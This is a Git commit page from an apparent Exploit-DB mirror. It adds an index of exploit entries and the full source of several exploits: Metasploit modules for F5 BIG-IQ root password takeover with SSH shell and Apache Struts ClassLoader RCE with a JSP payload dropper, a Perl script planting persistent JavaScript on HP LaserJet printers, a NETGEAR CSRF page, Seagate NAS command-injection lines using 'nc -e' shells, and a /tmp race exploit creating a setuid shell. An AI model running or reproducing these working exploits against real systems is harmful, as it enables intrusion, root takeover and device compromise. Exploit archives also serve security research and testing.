bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_04_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-04 04:36:23 +00:00
parent 36d3a5ce9d
commit 658e0cae3f
25 changed files with 1553 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

26
files.csv
View file

@ -8585,7 +8585,7 @@ id,file,description,date,author,platform,type,port
9101,platforms/php/webapps/9101.txt,"phpbms 0.96 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 (M3U File) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0
9103,platforms/php/webapps/9103.txt,"gencms 2006 Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BOF Exploit (SEH)",2009-07-10,His0k4,windows,local,0
9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 (uid) Remote SQL Injection Vulnerability",2009-07-10,Monster-Dz,php,webapps,0
9106,platforms/windows/remote/9106.txt,"citrix xencenterweb (xss/sql/rce) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0
9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability",2009-07-10,IRCRASH,php,webapps,0
@ -29734,6 +29734,7 @@ id,file,description,date,author,platform,type,port
32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0
32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0
32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0
32990,platforms/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent XSS via PJL Directory Traversal",2014-04-23,@0x00string,hardware,webapps,0
32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 'claroline/linker/notfound.php' Cross-Site Scripting Vulnerability",2009-05-08,"Gerendi Sandor Attila",php,webapps,0
32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 Cross Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0
32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0
@ -29762,6 +29763,7 @@ id,file,description,date,author,platform,type,port
33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability",2009-05-29,"Saint Patrick",linux,dos,0
33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0
33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management & Authentication Bypass Vulnerabilities",2014-04-25,"Jared Bird",multiple,webapps,0
33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
@ -29874,3 +29876,25 @@ id,file,description,date,author,platform,type,port
33134,platforms/linux/dos/33134.txt,"Adobe Flash Player <= 10.0.22 and AIR - 'intf_count' Integer Overflow Vulnerability",2009-07-30,"Roee Hay",linux,dos,0
33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0
33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS Vulnerability",2014-05-01,"Dolev Farhi",hardware,webapps,0
33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,metasploit,php,remote,443
33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,metasploit,multiple,remote,8080
33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation",2014-05-02,"Brandon Perry",hardware,remote,443
33144,platforms/php/webapps/33144.txt,"Censura Prior to 2.1.1 Multiple Cross Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0
33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation Vulnerability",2009-08-03,"Melissa Elliott",linux,local,0
33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 'reward_points.post.php' SQL Injection Vulnerability",2009-08-04,"Ryan Dewhurst",php,webapps,0
33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0
33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0
33149,platforms/php/webapps/33149.txt,"Alkacon OpenCms 7.x Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0
33150,platforms/hardware/webapps/33150.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - CSRF Vulnerability",2014-05-03,"Dolev Farhi",hardware,webapps,0
33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 'cat' Parameter Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0
33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 'shownews.php' Cross Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 'main.php' Cross Site Scripting Vulnerability",2009-08-10,"Hadi Kiamarsi",php,webapps,0
33155,platforms/php/webapps/33155.txt,"ViArt CMS forums.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
33156,platforms/php/webapps/33156.txt,"Crime24 Stealer Panel 1.0 - Multiple Vulnerabilities",2014-05-03,"Daisuke Dan",php,webapps,0
33157,platforms/php/webapps/33157.txt,"ViArt CMS forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
33158,platforms/php/webapps/33158.txt,"ViArt CMS forum_topic_new.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
33159,platforms/hardware/webapps/33159.txt,"Seagate BlackArmor NAS - Multiple Vulnerabilities",2014-05-03,"Shayan S",hardware,webapps,0
33160,platforms/php/webapps/33160.txt,"Papoo 3.x Upload Images Arbitrary File Upload Vulnerability",2009-08-10,"RedTeam Pentesting GmbH",php,webapps,0
33161,platforms/php/local/33161.php,"PHP 5.3 'mail.log' Configuration Option 'open_basedir' Restriction Bypass Vulnerability",2009-08-10,"Maksymilian Arciemowicz",php,local,0
33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0

Can't render this file because it is too large.

235
platforms/hardware/remote/33143.rb Executable file
View file

@ -0,0 +1,235 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'json'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "F5 BIG-IQ v4.1.0.2013.0 authenticated arbitrary user password change",
'Description' => %q{
F5 BIG-IQ v4.1.0.2013.0 is vulnerable to a privilege escalation attack which allows
an attacker to change the root users password. This module does just this, then SSH's in.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile@gmail.com>'
],
'References' =>
[
['URL', 'http://volatile-minds.blogspot.com/2014/05/f5-big-iq-v41020130-authenticated.html']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['BIG-IQ 4.1.0.2013.0', {}]
],
'Privileged' => true,
'DefaultOptions' =>
{
'SSL' => true,
'ExitFunction' => "none"
},
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'DisclosureDate' => "Sep 23 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
OptString.new('USERNAME', [true, 'The user to authenticate as.', 'username']),
OptString.new('PASSWORD', [true, 'The password to authenticate with.', 'password']),
OptString.new('ADMINISTRATOR', [true, 'The administrator to spoof for privilege escalation', 'root']),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
], self.class)
end
def exploit
post = {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD']
}
print_status("Authenticating as " + datastore['USERNAME'])
#Simple post to get us a cookie so we can change our password
res = send_request_cgi({
'method' => 'POST',
'uri' => '/ui/actions/logmein.html',
'vars_post' => post
})
if res.headers["Location"] != "/"
fail_with("Authentication failed")
end
cookie = res.get_cookies
#this gets turned into JSON
#
#generation will be set in try_generation if it isn't correct
#
#This is also the attempt at privilege escalation, so we preserve the password
post = {
"name" => datastore['ADMINISTRATOR'],
"displayName" => "fdsa",
"generation" => 1,
"lastUpdateMicros" => 1395360806678747,
"kind" => "shared:authz:users:usersworkerstate",
"selfLink" => "https://localhost/mgmt/shared/authz/users/" + datastore['USERNAME'],
"password" => datastore['PASSWORD'],
"password2" => datastore['PASSWORD'],
"state" => "ACTIVE"
}
print_status("Escalating privileges to that of " + datastore["ADMINISTRATOR"])
try_generation(post, cookie, '/mgmt/shared/authz/users/' + datastore['USERNAME'])
password = Rex::Text.rand_text_alpha(rand(32)+5)
#this is when we change the password for the root user
post = {
"name" => "root",
"displayName" => "root",
"generation" => 1,
"lastUpdateMicros" => 1395359570236413,
"kind" => "shared:authz:users:usersworkerstate",
"selfLink" => "https://localhost/mgmt/shared/authz/users/root",
"password" => password,
"password2" => password,
"state" => "ACTIVE"
}
select(nil,nil,nil,5)
print_status("Changing root user password to " + password)
try_generation(post, cookie, '/mgmt/shared/authz/users/root')
res = do_login('root', password)
if res
print_good("Login Successful with 'root:#{password}'")
handler(res.lsock)
end
end
def try_generation(put, cookie, uri)
done = false
while !done
res = send_request_cgi({
'method' => "PUT",
'uri' => uri,
'data' => put.to_json,
'cookie' => cookie
})
if res and res.body =~ /Invalid generation/
put['generation'] = /Need (\d{1,9}), received \d{1,9}/.match(res.body)[1]
elsif res and res.body =~ /encryptedPassword/
done = true
else
fail_with("Didn't get a response that I expected")
end
end
end
def do_login(user, pass)
opts = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => 22,
:disable_agent => true,
:config => true,
:password => pass,
:record_auth_info => true,
:proxies => datastore['Proxies']
}
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
ssh = Net::SSH.start(datastore['RHOST'], user, opts)
rescue Rex::ConnectionError, Rex::AddressInUse
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
return conn
end
return nil
end
end
__END__
msf exploit(f5_bigiq_passwd_update) > show options
Module options (exploit/linux/http/f5_bigiq_passwd_update):
Name Current Setting Required Description
---- --------------- -------- -----------
ADMINISTRATOR root yes The administrator to spoof for privilege escalation
PASSWORD notpassword yes The password to authenticate with.
Proxies no Use a proxy chain
RHOST 192.168.1.8 yes The target address
RPORT 443 yes The target port
SSH_TIMEOUT 30 no Specify the maximum time to negotiate a SSH session
TARGETURI / yes The URI of the vulnerable instance
USERNAME username yes The user to authenticate as.
VHOST no HTTP server virtual host
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 a
msf exploit(f5_bigiq_passwd_update) > exploit
[+] Login Successful with 'root:qBvBY'
[*] Found shell.
[*] Command shell session 3 opened (192.168.1.31:58165 -> 192.168.1.8:22) at 2014-03-20 21:18:09 -0500
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh

256
platforms/hardware/webapps/32990.pl Executable file
View file

@ -0,0 +1,256 @@
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;
my $host = $ARGV[0];
# Exploit Title: HP Laser Jet Persistent Javascript Cross Site Scripting via PJL
# Google Dork: n/a
# Date: 4/22/14
# Exploit Author: @0x00string
# Vendor Homepage: http://www.hp.com/products1/laserjetprinters/
# Software Link: n/a
# Version: HP LaserJet P/M xxxx (LaserJets with network conectivity, PJL and onboard storage)
# Tested on: P4015n, P2035n, P4014, M3035 MFP, CP 3525, etc.
# CVE : CVE-2010-4107,
# This script will infect all pages on HP laserjets which include ews_functions.js by appending javascript to the ews_functions.js file by leveraging the PJL Directory Traversal
print "\t _______ __ __ _______ _______ _______ _______ ______ ___ __ _ _______
\t| _ || |_| || _ || _ || || || _ | | | | | | || |
\t| | | || || | | || | | || _____||_ _|| | || | | | |_| || ___|
\t| | | || || | | || | | || |_____ | | | |_||_ | | | || | __
\t| |_| | | | | |_| || |_| ||_____ | | | | __ || | | _ || || |
\t| || _ || || | _____| | | | | | | || | | | | || |_| |
\t|_______||__| |__||_______||_______||_______| |___| |___| |_||___| |_| |__||_______|
\t HP Laser Jet persistent Javascript XSS
\t via PJL Dir Trav\n\n";
$| = 1;
infect($host);
sub infect {
my $co = 0;
my (@returned, $temp, @files, @sizes, $size, $data);
my $socket = new IO::Socket::INET (
PeerHost => $host,
PeerPort => '9100',
Proto => 'tcp',
) or die $!;
if ($socket) {
$data =
"\x1b\x25\x2d\x31\x32".
"\x33\x34\x35\x58\x40".
"\x50\x4a\x4c\x20\x46".
"\x53\x44\x49\x52\x4c".
"\x49\x53\x54\x20\x4e".
"\x41\x4d\x45\x20\x3d".
"\x20\x22\x30\x3a\x5c".
"\x5c\x77\x65\x62\x53".
"\x65\x72\x76\x65\x72".
"\x5c\x5c\x68\x6f\x6d".
"\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73".
"\x5c\x5c\x22\x20\x45".
"\x4e\x54\x52\x59\x3d".
"\x31\x20\x43\x4f\x55".
"\x4e\x54\x3d\x39\x39".
"\x39\x0a\x0d\x1b\x25".
"\x2d\x31\x32\x33\x34\x35\x58";
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
@returned = split('\n', $temp);
foreach(@returned) {
if ($_ =~ /(.*?)\ TYPE\=FILE\ SIZE\=(\d{1,99})/) {
push(@files, $1);
push(@sizes, $2);
}
}
}
my $two = 0;
foreach(@files) {
if ($_ =~ /RestrictColor\.js/ || $_ =~ /ews_functions\.js/) {
$two++;
}
}
if ($two > 1) {
if ($socket) {
while ($co < scalar(@files)) {
if ($files[$co] =~ /ews/) {
$size = $sizes[$co];
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x55\x50".
"\x4c\x4f\x41\x44\x20\x4e\x41\x4d\x45".
"\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77".
"\x65\x62\x53\x65\x72\x76\x65\x72\x5c".
"\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77".
"\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x73\x2e\x6a\x73\x22\x20\x4f\x46".
"\x46\x53\x45\x54\x3d\x30\x20\x53\x49".
"\x5a\x45\x20\x3d\x20" . $size.
"\x0d\x0a";
}
$co++;
}
$temp = undef;
#print "\n$data\n";
$socket = tx($socket, $data);
$data = undef;
if ($socket) {
($socket, $temp) = rx($socket, $size);
#print "\n$temp\n";
my @original = split('\n', $temp);
$temp = "";
shift(@original);
foreach(@original) {
$temp = $temp . $_ . "\n";
}
#print $temp;
}
}
}
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x41\x50".
"\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d".
"\x41\x54\x3a\x42\x49\x4e\x41\x52\x59".
"\x20\x4e\x41\x4d\x45".
"\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77".
"\x65\x62\x53\x65\x72\x76\x65\x72\x5c".
"\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77".
"\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x73\x2e\x42\x41\x4b".
"\x22\x20\x53\x49\x5a\x45\x20\x3d\x20".
length($temp) . "\x0d\x0a". $temp.
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58";
#print $data;
if ($socket) {
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
}
if ($socket) {
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x51\x55".
"\x45\x52\x59\x20\x4e\x41\x4d\x45\x20".
"\x3d\x20\x22\x30\x3a\x5c\x5c\x77\x65".
"\x62\x53\x65\x72\x76\x65\x72\x5c\x5c".
"\x68\x6f\x6d\x65\x5c\x5c\x6a\x73\x66".
"\x69\x6c\x65\x73\x5c\x5c\x65\x77\x73".
"\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e".
"\x73\x2e\x42\x41\x4b\x22\x0d\x0a";
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
exit(0) unless ($temp =~ /ews\_functions\.BAK/);
}
if ($socket) {
my $payload =
"\x76\x61\x72\x20\x65\x78\x70\x6c\x6f".
"\x69\x74\x20\x3d\x20\x64\x6f\x63\x75".
"\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61".
"\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74".
"\x28\x22\x64\x69\x76\x22\x29\x3b\x20".
"\x65\x78\x70\x6c\x6f\x69\x74\x2e\x69".
"\x6e\x6e\x65\x72\x48\x54\x4d\x4c\x20".
"\x3d\x20\x27\x3c\x64\x69\x76\x3e\x3c".
"\x66\x6f\x6e\x74\x20\x73\x69\x7a\x65".
"\x3d\x35\x30\x3e".
"\x41\x41\x41\x41" . "\x3c". # <--- this is being added to the page as an element. put whatever you'd like here, but check your lengths!
"\x2f\x66\x6f\x6e\x74\x3e\x3c\x2f\x64".
"\x69\x76\x3e\x27\x3b\x20\x64\x6f\x63".
"\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74".
"\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42".
"\x79\x54\x61\x67\x4e\x61\x6d\x65\x28".
"\x27\x62\x6f\x64\x79\x27\x29\x5b\x30".
"\x5d\x2e\x61\x70\x70\x65\x6e\x64\x43".
"\x68\x69\x6c\x64\x28\x65\x78\x70\x6c".
"\x6f\x69\x74\x29\x3b";
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x41\x50".
"\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d".
"\x41\x54\x3a\x42\x49\x4e\x41\x52\x59".
"\x20\x4e\x41\x4d\x45\x20\x3d\x22\x30".
"\x3a\x5c\x5c\x77\x65\x62\x53\x65\x72".
"\x76\x65\x72\x5c\x5c\x68\x6f\x6d\x65".
"\x5c\x5c\x6a\x73\x66\x69\x6c\x65\x73".
"\x5c\x5c\x65\x77\x73\x5f\x66\x75\x6e".
"\x63\x74\x69\x6f\x6e\x73\x2e\x6a\x73".
"\x22\x20\x53\x49\x5a\x45\x20\x3d\x20".
length($payload) . "\x0d\x0a". $payload.
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58";
$socket = tx($socket, $data);
exit(0);
}
}
sub tx {
my $socket = shift;
my $data = shift;
$socket->send($data) or die $!;
return $socket;
}
sub rx {
my $socket = shift;
my $second_size = shift;
unless ($second_size) {
$second_size = 2048;
}
my $data = undef;
eval {
local $SIG{ALRM} = sub { die 'Timed Out'; };
alarm 10;
$socket->recv($data, 2048);
if ($data) {
while (length($data) < (length($data) + $second_size)) {
my $moar;
$socket->recv($moar, length($second_size + 1));
$data = $data . $moar;
}
alarm 0;
return ($socket, $data);
}
};
alarm 0;
return($socket, $data);
}

58
platforms/hardware/webapps/33150.txt Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel
# Date 02/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://netgear.com
# Affected Firmware version: 1.0.0.29_1.7.29_HotS
# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router
Summary
=======
A CSRF Attack was discovered in the Admin panel of NETGEAR DGN2200 Router.
Vulnerability Description
=========================
Cross Site Request Forgery attack (CSRF)
PoC
====
POST /password.cgi HTTP/1.1
Host: 10.0.0.138
Proxy-Connection: keep-alive
Content-Length: 122
Cache-Control: max-age=0
Authorization: Basic QWRtaW46VG9vbGJveDEj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.138
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.138/PWD_password.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply
Exploit
=========
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Admin password</H2>
<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">
<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>
<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>
<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>
<input type="hidden" name="authTImeout" value="5"/>
<input type="hidden" name="cfAlert_Apply" value="Apply"/>
</form>
</body>
</html>

50
platforms/hardware/webapps/33159.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Seagate BlackArmor NAS Multiple Vulnerabilities
# Date: 2/17/14
# Exploit Author: Shayan Sadigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com>
# Vendor Homepage: http://www.seagate.com/external-hard-drives/network-storage/
# Version: All BlackArmor NAS devices..
# Tested on: Linux
# CVE : N/A
1. some sort of backdoor user (hardcoded credentials) in backupmgt/pre_connect_check.php
$password = '!~@#$EW#$$%FREDESWWSED';
/////////////////////////////////////////////////////////////////////////////////////////////////////////
2. remote [root] code execution, this software is riddled with many many bugs, including tons of rce..
examples: localhost/backupmgt/localJob.php
Vulnerable code:
$session = $_GET["session"];
$tempsrc = exec("cat $immedLog | grep $session | cut -d '".Chr(002)."' -f 3");
$des = exec("cat $immedLog | grep $session | cut -d '".Chr(002)."' -f 4");
PoC: curl "localhost/backupmgt/localJob.php?session=fail;nc -e 127.0.0.1 99;"
-------------------------
listening on [any] 99 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 57157
id
uid=0(root) gid=0(root)
another example: localhost/backupmgmt/pre_connect_check.php
Vulnerable code:
$ipString = $_GET["server_ip"];
$auth_name = $_GET["auth_name"];
$password = $_GET["auth_pass"];
$alias_name = $_GET["alias_name"];
$dryString ="rsync -rnP --password-file=temp.pas"." --log-file=pre.log --contimeout=5 /usr/sbin ".$auth_name."@".$ipString."::".$alias_name;
$result =@exec ($dryString); // produce temp pre log
PoC: curl "localhost/backupmgt/pre_connect_check.php?auth_name=fail;nc -e 127.0.0.1 99;"
-------------------------
listening on [any] 99 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 52348
id
uid=0(root) gid=0(root)
There's ton of more bugs in BlackArmor NAS software, there have been other releases noting other bugs (killProcesses.php RCE), Seagate has decided to ignore any messages regarding these..claiming they are only working on newer products now.

19
platforms/linux/dos/33148.c Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/35976/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
This issue was introduced in Linux kernel 2.6.28-rc1 and fixed in 2.6.31-rc5-git3.
#include <time.h>
int main(void)
{
struct timespec ts;
ts.tv_sec = 1;
ts.tv_nsec = 0;
return clock_nanosleep(4, 0, &ts, NULL);
}

38
platforms/linux/local/33145.c Executable file
View file

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/35924/info
PHP Fuzzer Framework creates temporary files in an insecure manner.
An attacker with local access could potentially exploit this issue to overwrite and execute arbitrary code with the privileges of the victim user. Successfully exploiting this issue may compromise the affected application and possibly the computer.
#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#define FILEA "/tmp/PFF/fuzz0.php"
#define FILEB "/tmp/fuzzlol.php"
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)
int main(int argc, char *argv[])
{
int f,n,w;
char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
struct inotify_event e;
n = inotify_init();
printf("-=*************-\n");
if ((f = open(FILEB, O_CREAT | O_RDWR| O_EXCL, MODEZ)) > 0){
write(f, s, strlen(s));
close(f);
}
printf("[+] created abritrary code: %s\n", FILEB);
w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
read(n, &e, sizeof(e));
rename(FILEB, FILEA);
printf("[+] %s => %s\n", FILEB, FILEA);
printf("[+] executing arbitrary code\n");
sleep(2);
printf("[+] racism complete \n");
execl("/tmp/sh", "/tmp/sh", 0);
}

229
platforms/multiple/remote/33142.rb Executable file
View file

@ -0,0 +1,229 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # It's going to manipulate the Class Loader
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows
access to 'class' parameter which is directly mapped to getClass() method and
allows ClassLoader manipulation, which allows remote attackers to execute arbitrary
Java code via crafted parameters.
},
'Author' =>
[
'Mark Thomas', # Vulnerability Discovery
'Przemyslaw Celej', # Vulnerability Discovery
'pwntester <alvaro[at]pwntester.com>', # PoC
'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-0094'],
['CVE', '2014-0112'],
['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
],
'Platform' => %w{ linux win },
'Payload' =>
{
'Space' => 5000,
'DisableNops' => true
},
'Targets' =>
[
['Java',
{
'Arch' => ARCH_JAVA,
'Platform' => %w{ linux win }
},
],
['Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
['Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
]
],
'DisclosureDate' => 'Mar 06 2014',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
], self.class)
end
def jsp_dropper(file, exe)
dropper = <<-eos
<%@ page import=\"java.io.FileOutputStream\" %>
<%@ page import=\"sun.misc.BASE64Decoder\" %>
<%@ page import=\"java.io.File\" %>
<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %>
<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %>
<% oFile.flush(); %>
<% oFile.close(); %>
<% File f = new File(\"#{file}\"); %>
<% f.setExecutable(true); %>
